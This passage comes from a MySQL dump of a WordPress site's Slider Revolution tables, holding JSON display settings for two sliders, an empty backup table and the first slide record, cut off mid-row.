horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":false,\"rtl\":false,\"style\":3000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"align\":\"slider\",\"space\":\"5\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":true,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"-50\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"scroll\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false},\"version\":\"6.6.0\"}','{\"version\":\"6.6.0\"}',''),
(4,'gsw2023','the7-software-company-slider','{\"addOns\":[],\"version\":\"6.6.0\",\"pakps\":false,\"shortcode\":\"[rev_slider alias=\\\"the7-software-company-slider\\\"][\\/rev_slider]\",\"type\":\"standard\",\"layouttype\":\"auto\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"id\":\"\",\"class\":\"\",\"wrapperclass\":\"\",\"snap\":{\"adjust\":\"none\",\"snap\":false,\"helpLines\":false,\"gap\":20},\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\",\"token_source\":\"account\",\"connect_with\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\",\"token_source\":\"account\",\"connect_with\":\"\",\"page_id\":\"\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"intelligentInherit\":true,\"autoResponsive\":true,\"responsiveChilds\":true,\"responsiveOffset\":true,\"transition\":\"fade\",\"transitionDuration\":\"700\",\"delay\":\"3000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"none\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"enableUpscaling\":false,\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"maxWidth\":\"\",\"maxHeight\":0,\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1100,\"n\":1000,\"t\":900,\"m\":800},\"height\":{\"d\":620,\"n\":580,\"t\":700,\"m\":800},\"editorCache\":{\"d\":620,\"n\":580,\"t\":700,\"m\":800},\"overflow\":false,\"useFullScreenHeight\":true,\"overflowHidden\":false,\"gridEQModule\":false,\"forceOverflow\":false,\"keepBPHeight\":false,\"ignoreHeightChanges\":true},\"codes\":{\"css\":\"\",\"javascript\":\"\"},\"carousel\":{\"justify\":false,\"justifyMaxWidth\":false,\"snap\":true,\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"power3.inOut\",\"fadeOut\":true,\"scale\":false,\"offsetScale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"maxOpacity\":100,\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"#111111\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"dottedOverlaySize\":1,\"dottedColorA\":\"transparent\",\"dottedColorB\":\"#000000\",\"shadow\":\"8\",\"useImage\":false,\"image\":\"\",\"imageSourceType\":\"full\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\",\"fixedOnTop\":false,\"addClear\":false}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"slideShow\":true,\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"1\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":true,\"viewPortStart\":\"wait\",\"viewPortArea\":{\"d\":{\"v\":\"20%\",\"e\":false,\"u\":\"\"},\"n\":{\"v\":\"20%\",\"e\":false,\"u\":\"\"},\"t\":{\"v\":\"20%\",\"e\":false,\"u\":\"\"},\"m\":{\"v\":\"20%\",\"e\":false,\"u\":\"\"}},\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"globalViewPort\":true,\"globalViewDist\":\"-200px\"},\"progressbar\":{\"set\":false,\"alignby\":\"slider\",\"style\":\"horizontal\",\"size\":\"5\",\"radius\":10,\"vertical\":\"top\",\"horizontal\":\"left\",\"x\":0,\"y\":0,\"color\":\"rgba(0,0,0,0.15)\",\"bgcolor\":\"transparent\",\"basedon\":\"slide\",\"gapsize\":0,\"gap\":false,\"gapcolor\":\"rgba(255,255,255,0.5)\",\"reset\":\"reset\",\"visibility\":{\"d\":true,\"m\":true,\"n\":true,\"t\":true}},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"icache\":\"default\",\"DPR\":\"dpr\",\"observeWrap\":false,\"layerSelection\":false,\"lazyLoad\":\"smart\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"enableurlhash\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false,\"perspective\":600,\"perspectiveType\":\"local\"},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"setMobileCarousel\":true,\"setDesktopCarousel\":true,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"direction\":\"horizontal\",\"set\":false},\"mouse\":{\"set\":false,\"reverse\":\"default\",\"viewport\":50,\"calldelay\":1000},\"arrows\":{\"set\":false,\"rtl\":false,\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"style\":1000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"left\":{\"anim\":\"fade\",\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"anim\":\"fade\",\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"anim\":\"fade\",\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\",\"mhoffset\":0,\"mvoffset\":0},\"tabs\":{\"anim\":\"fade\",\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\",\"mhoffset\":0,\"mvoffset\":0},\"bullets\":{\"anim\":\"fade\",\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"set\":false,\"rtl\":false,\"style\":3000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"align\":\"slider\",\"space\":\"5\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"simplify_ie8_ios4\":false,\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"debugMode\":false},\"parallax\":{\"set\":true,\"setDDD\":false,\"disableOnMobile\":true,\"levels\":[\"1.5\",\"3\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"5000\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"slidercenter\",\"type\":\"mousescroll\"}},\"modal\":{\"bodyclass\":\"\",\"horizontal\":\"center\",\"vertical\":\"middle\",\"cover\":true,\"coverColor\":\"rgba(0,0,0,0.5)\",\"coverSpeed\":1000},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"layers\":false,\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"parallaxLayers\":false,\"staticLayers\":false,\"staticParallaxLayers\":false,\"tilt\":\"30\"},\"scrolltimeline\":{\"set\":false,\"fixed\":false,\"fixedStart\":2000,\"fixedEnd\":4000,\"layers\":false,\"ease\":\"none\",\"speed\":500,\"pullcontent\":false},\"skins\":{\"colorsAtStart\":false,\"cid\":2,\"colors\":[{\"alias\":\"Highlight\",\"v\":\"#ff0000\",\"ref\":[]},{\"alias\":\"Headline Text\",\"v\":\"#ffffff\",\"ref\":[]},{\"alias\":\"Content Text\",\"v\":\"#00ffff\",\"ref\":[]}]},\"modalshortcode\":\"[rev_slider usage=\\\"modal\\\" alias=\\\"the7-software-company-slider\\\"][\\/rev_slider]\"}','{\"version\":\"6.6.0\"}',''),
(5,'gsw23','gsw2023-1','{\"addOns\":[],\"version\":\"6.5.19\",\"pakps\":false,\"shortcode\":\"[rev_slider alias=\\\"gsw2023-1\\\"][\\/rev_slider]\",\"type\":\"standard\",\"layouttype\":\"auto\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"id\":\"\",\"class\":\"\",\"wrapperclass\":\"\",\"snap\":{\"adjust\":\"none\",\"snap\":false,\"helpLines\":false,\"gap\":20},\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\",\"token_source\":\"account\",\"connect_with\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\",\"token_source\":\"account\",\"connect_with\":\"\",\"page_id\":\"\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"intelligentInherit\":true,\"autoResponsive\":true,\"responsiveChilds\":true,\"responsiveOffset\":true,\"transition\":\"fade\",\"transitionDuration\":\"700\",\"delay\":\"3000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"none\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"enableUpscaling\":false,\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"maxWidth\":\"\",\"maxHeight\":0,\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1100,\"n\":1000,\"t\":900,\"m\":800},\"height\":{\"d\":620,\"n\":580,\"t\":700,\"m\":800},\"editorCache\":{\"d\":620,\"n\":580,\"t\":700,\"m\":800},\"overflow\":false,\"useFullScreenHeight\":true,\"overflowHidden\":false,\"gridEQModule\":false,\"forceOverflow\":false,\"keepBPHeight\":false,\"ignoreHeightChanges\":true},\"codes\":{\"css\":\"\",\"javascript\":\"\"},\"carousel\":{\"justify\":false,\"justifyMaxWidth\":false,\"snap\":true,\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"power3.inOut\",\"fadeOut\":true,\"scale\":false,\"offsetScale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"maxOpacity\":100,\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"#111111\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"dottedOverlaySize\":1,\"dottedColorA\":\"transparent\",\"dottedColorB\":\"#000000\",\"shadow\":\"8\",\"useImage\":false,\"image\":\"\",\"imageSourceType\":\"full\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\",\"fixedOnTop\":false,\"addClear\":false}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"slideShow\":true,\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"1\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":true,\"viewPortStart\":\"wait\",\"viewPortArea\":{\"d\":{\"v\":\"20%\",\"e\":false,\"u\":\"\"},\"n\":{\"v\":\"20%\",\"e\":false,\"u\":\"\"},\"t\":{\"v\":\"20%\",\"e\":false,\"u\":\"\"},\"m\":{\"v\":\"20%\",\"e\":false,\"u\":\"\"}},\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"globalViewPort\":true,\"globalViewDist\":\"-200px\"},\"progressbar\":{\"set\":false,\"alignby\":\"slider\",\"style\":\"horizontal\",\"size\":\"5\",\"radius\":10,\"vertical\":\"top\",\"horizontal\":\"left\",\"x\":0,\"y\":0,\"color\":\"rgba(0,0,0,0.15)\",\"bgcolor\":\"transparent\",\"basedon\":\"slide\",\"gapsize\":0,\"gap\":false,\"gapcolor\":\"rgba(255,255,255,0.5)\",\"reset\":\"reset\",\"visibility\":{\"d\":true,\"m\":true,\"n\":true,\"t\":true}},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"icache\":\"default\",\"DPR\":\"dpr\",\"observeWrap\":false,\"layerSelection\":false,\"lazyLoad\":\"smart\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"enableurlhash\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false,\"perspective\":600,\"perspectiveType\":\"local\"},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"setMobileCarousel\":true,\"setDesktopCarousel\":true,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"direction\":\"horizontal\",\"set\":false},\"mouse\":{\"set\":false,\"reverse\":\"default\",\"viewport\":50,\"calldelay\":1000},\"arrows\":{\"set\":false,\"rtl\":false,\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"style\":1000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"left\":{\"anim\":\"fade\",\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"anim\":\"fade\",\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"anim\":\"fade\",\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\",\"mhoffset\":0,\"mvoffset\":0},\"tabs\":{\"anim\":\"fade\",\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\",\"mhoffset\":0,\"mvoffset\":0},\"bullets\":{\"anim\":\"fade\",\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"set\":false,\"rtl\":false,\"style\":3000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"align\":\"slider\",\"space\":\"5\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"simplify_ie8_ios4\":false,\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"debugMode\":false},\"parallax\":{\"set\":true,\"setDDD\":false,\"disableOnMobile\":true,\"levels\":[\"1.5\",\"3\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"5000\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"slidercenter\",\"type\":\"mousescroll\"}},\"modal\":{\"bodyclass\":\"\",\"horizontal\":\"center\",\"vertical\":\"middle\",\"cover\":true,\"coverColor\":\"rgba(0,0,0,0.5)\",\"coverSpeed\":1000},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"layers\":false,\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"parallaxLayers\":false,\"staticLayers\":false,\"staticParallaxLayers\":false,\"tilt\":\"30\"},\"scrolltimeline\":{\"set\":false,\"fixed\":false,\"fixedStart\":2000,\"fixedEnd\":4000,\"layers\":false,\"ease\":\"none\",\"speed\":500,\"pullcontent\":false},\"skins\":{\"colorsAtStart\":false,\"cid\":2,\"colors\":[{\"alias\":\"Highlight\",\"v\":\"#ff0000\",\"ref\":[]},{\"alias\":\"Headline Text\",\"v\":\"#ffffff\",\"ref\":[]},{\"alias\":\"Content Text\",\"v\":\"#00ffff\",\"ref\":[]}]},\"modalshortcode\":\"[rev_slider usage=\\\"modal\\\" alias=\\\"gsw2023-1\\\"][\\/rev_slider]\"}','{\"version\":\"6.5.19\"}','');
/*!40000 ALTER TABLE `dnctiavkr_revslider_sliders` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_revslider_sliders_bkp`
--

DROP TABLE IF EXISTS `dnctiavkr_revslider_sliders_bkp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_revslider_sliders_bkp` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `title` tinytext NOT NULL,
  `alias` tinytext DEFAULT NULL,
  `params` longtext NOT NULL,
  `settings` text DEFAULT NULL,
  `type` varchar(191) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `type_index` (`type`(8))
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_revslider_sliders_bkp`
--

LOCK TABLES `dnctiavkr_revslider_sliders_bkp` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_revslider_sliders_bkp` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_revslider_sliders_bkp` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_revslider_slides`
--

DROP TABLE IF EXISTS `dnctiavkr_revslider_slides`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_revslider_slides` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `slider_id` int(9) NOT NULL,
  `slide_order` int(11) NOT NULL,
  `params` longtext NOT NULL,
  `layers` longtext NOT NULL,
  `settings` text NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `slider_id_index` (`slider_id`)
) ENGINE=InnoDB AUTO_INCREMENT=15 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_revslider_slides`
--

LOCK TABLES `dnctiavkr_revslider_slides` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_revslider_slides` DISABLE KEYS */;
INSERT INTO `dnctiavkr_revslider_slides` VALUES
(1,1,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/revslider\\/the7-landing-hero-image\\/bg-blur.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"\"}},\"thumb\":{\"customThumbSrc\":\"\",\"dimension\":\"slider\"},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]},\"panzoom\":{\"ease\":\"none\"},\"version\":\"6.4.0\"}','{\"18\":{\"text\":\"Image 